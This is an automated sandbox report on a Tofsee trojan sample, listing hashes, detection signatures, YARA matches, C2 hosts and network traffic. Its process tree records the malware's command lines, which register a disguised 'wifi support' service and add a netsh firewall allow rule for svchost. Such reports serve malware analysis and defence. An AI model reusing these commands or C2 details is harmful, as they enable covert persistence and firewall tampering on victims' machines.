Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OcmKX57vR7

Overview

General Information

Sample Name:OcmKX57vR7 (renamed file extension from none to exe)
Analysis ID:658475
MD5:db4d9ca855430682836db0a535e75594
SHA1:7a9a84d79268c30b93c48f981190182197712493
SHA256:a96edd53cb70eb51f8bb9fbd0b9d0777e6b65c5203fb3b73229431b49da155e4
Tags:32CoinMinerexetrojan
Infos:

Detection

Tofsee
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Uses netsh to modify the Windows network and firewall settings
Query firmware table information (likely to detect VMs)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Writes to foreign memory regions
Changes security center settings (notifications, updates, antivirus, firewall)
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the windows firewall
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Modifies existing windows services
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Uses SMTP (mail sending)
Found evaded block containing many API calls
Queries disk information (often used to detect virtual machines)
Contains functionality to query network adapater information

Classification

Process Tree

  • System is w10x64
  • OcmKX57vR7.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\OcmKX57vR7.exe" MD5: DB4D9CA855430682836DB0A535E75594)
    • cmd.exe (PID: 6440 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ghrubsm\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6488 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\pjzcupje.exe" C:\Windows\SysWOW64\ghrubsm\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6540 cmdline: C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6636 cmdline: C:\Windows\System32\sc.exe" description ghrubsm "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6740 cmdline: "C:\Windows\System32\sc.exe" start ghrubsm MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 6804 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • pjzcupje.exe (PID: 6792 cmdline: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d"C:\Users\user\Desktop\OcmKX57vR7.exe" MD5: CD1553A922DBF34673BA9D9D9A0FF5DE)
    • svchost.exe (PID: 6936 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 7012 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7048 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7124 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2560 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 2912 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5484 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6728 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5044 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6392 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4432 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Tofsee

{"C2 list": ["svartalfheim.top:443", "jo:443"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
    00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
      00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_TofseeDetects TofseeditekSHen
      • 0xfc3e:$s1: n%systemroot%\system32\cmd.exe
      • 0xed10:$s2: loader_id
      • 0xed40:$s3: start_srv
      • 0xed70:$s4: lid_file_upd
      • 0xed64:$s5: localcfg
      • 0xf494:$s6: Incorrect respons
      • 0xf574:$s7: mx connect error
      • 0xf4f0:$s8: Error sending command (sent = %d/%d)
      • 0xf628:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
      0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
        0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmpMALWARE_Win_TofseeDetects TofseeditekSHen
        • 0x1123e:$s1: n%systemroot%\system32\cmd.exe
        • 0x10310:$s2: loader_id
        • 0x10340:$s3: start_srv
        • 0x10370:$s4: lid_file_upd
        • 0x10364:$s5: localcfg
        • 0x10a94:$s6: Incorrect respons
        • 0x10b74:$s7: mx connect error
        • 0x10af0:$s8: Error sending command (sent = %d/%d)
        • 0x10c28:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.OcmKX57vR7.exe.400000.0.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
          0.2.OcmKX57vR7.exe.400000.0.unpackMALWARE_Win_TofseeDetects TofseeditekSHen
          • 0xfc3e:$s1: n%systemroot%\system32\cmd.exe
          • 0xed10:$s2: loader_id
          • 0xed40:$s3: start_srv
          • 0xed70:$s4: lid_file_upd
          • 0xed64:$s5: localcfg
          • 0xf494:$s6: Incorrect respons
          • 0xf574:$s7: mx connect error
          • 0xf4f0:$s8: Error sending command (sent = %d/%d)
          • 0xf628:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
          0.3.OcmKX57vR7.exe.af0000.0.unpackMALWARE_Win_TofseeDetects TofseeditekSHen
          • 0xe110:$s2: loader_id
          • 0xe140:$s3: start_srv
          • 0xe170:$s4: lid_file_upd
          • 0xe164:$s5: localcfg
          • 0xe894:$s6: Incorrect respons
          0.2.OcmKX57vR7.exe.400000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
            0.2.OcmKX57vR7.exe.400000.0.raw.unpackMALWARE_Win_TofseeDetects TofseeditekSHen
            • 0x1123e:$s1: n%systemroot%\system32\cmd.exe
            • 0x10310:$s2: loader_id
            • 0x10340:$s3: start_srv
            • 0x10370:$s4: lid_file_upd
            • 0x10364:$s5: localcfg
            • 0x10a94:$s6: Incorrect respons
            • 0x10b74:$s7: mx connect error
            • 0x10af0:$s8: Error sending command (sent = %d/%d)
            • 0x10c28:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
            Click to see the 23 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.38.8.8.854960532023883 07/07/22-01:02:53.847400
            SID:2023883
            Source Port:54960
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.863332532023883 07/07/22-01:02:13.617293
            SID:2023883
            Source Port:63332
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.857723532023883 07/07/22-01:01:33.050484
            SID:2023883
            Source Port:57723
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: svartalfheim.top:443Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\pjzcupje.exeAvira: detection malicious, Label: HEUR/AGEN.1242277
            Multi AV Scanner detection for submitted file
            Source: OcmKX57vR7.exeVirustotal: Detection: 49%Perma Link
            Source: OcmKX57vR7.exeMetadefender: Detection: 45%Perma Link
            Source: OcmKX57vR7.exeReversingLabs: Detection: 84%
            Multi AV Scanner detection for domain / URL
            Source: svartalfheim.topVirustotal: Detection: 10%Perma Link
            Machine Learning detection for sample
            Source: OcmKX57vR7.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\pjzcupje.exeJoe Sandbox ML: detected
            Source: 17.2.svchost.exe.2510000.0.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 0.2.OcmKX57vR7.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 0.3.OcmKX57vR7.exe.af0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 13.3.pjzcupje.exe.b50000.0.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 13.2.pjzcupje.exe.b50000.2.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 0.2.OcmKX57vR7.exe.ad0e67.1.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 13.2.pjzcupje.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
            Source: 13.2.pjzcupje.exe.b30e67.1.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 0.2.OcmKX57vR7.exe.400000.0.unpackMalware Configuration Extractor: Tofsee {"C2 list": ["svartalfheim.top:443", "jo:443"]}

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeUnpacked PE file: 0.2.OcmKX57vR7.exe.400000.0.unpack
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeUnpacked PE file: 13.2.pjzcupje.exe.400000.0.unpack
            Source: OcmKX57vR7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: Binary string: C:\cowuyal\goseyacav56 vekahapej 67\gidexazanevo.pdb source: OcmKX57vR7.exe, pjzcupje.exe.0.dr
            Source: Binary string: [C:\cowuyal\goseyacav56 vekahapej 67\gidexazanevo.pdb source: OcmKX57vR7.exe, pjzcupje.exe.0.dr

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.0 25Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeDomain query: svartalfheim.top
            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.173.215.82 443Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:57723 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:63332 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:54960 -> 8.8.8.8:53
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: svartalfheim.top:443
            Source: Malware configuration extractorURLs: jo:443
            Source: Joe Sandbox ViewASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
            Source: Joe Sandbox ViewIP Address: 40.93.207.0 40.93.207.0
            Source: global trafficTCP traffic: 192.168.2.3:49744 -> 40.93.207.0:25
            Source: svchost.exe, 0000001A.00000002.528990396.0000023757A8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.439059980.000001D6C5900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528667704.00000290CD100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: svchost.exe, 0000001A.00000002.528990396.0000023757A8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.438828550.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.401236022.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528434490.00000290CC8DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
            Source: svchost.exe, 0000001A.00000002.528559919.00000237524A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumer
            Source: svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
            Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
            Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
            Source: svchost.exe, 00000015.00000003.317741272.000001E9FBE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318344962.000001E9FBE6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
            Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000015.00000003.317808860.000001E9FBE4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.318051847.000001E9FBE50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
            Source: svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318321603.000001E9FBE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318321603.000001E9FBE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
            Source: svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000015.00000003.317905164.000001E9FBE45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
            Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317905164.000001E9FBE45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000015.00000003.317932502.000001E9FBE39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/geni
            Source: svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
            Source: svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
            Source: svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
            Source: svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
            Source: svchost.exe, 0000001E.00000003.419224721.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
            Source: svchost.exe, 0000001E.00000003.419259422.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419125131.000001D6C59BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419241431.000001D6C59A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419224721.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419194698.000001D6C59BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
            Source: unknownDNS traffic detected: queries for: microsoft-com.mail.protection.outlook.com
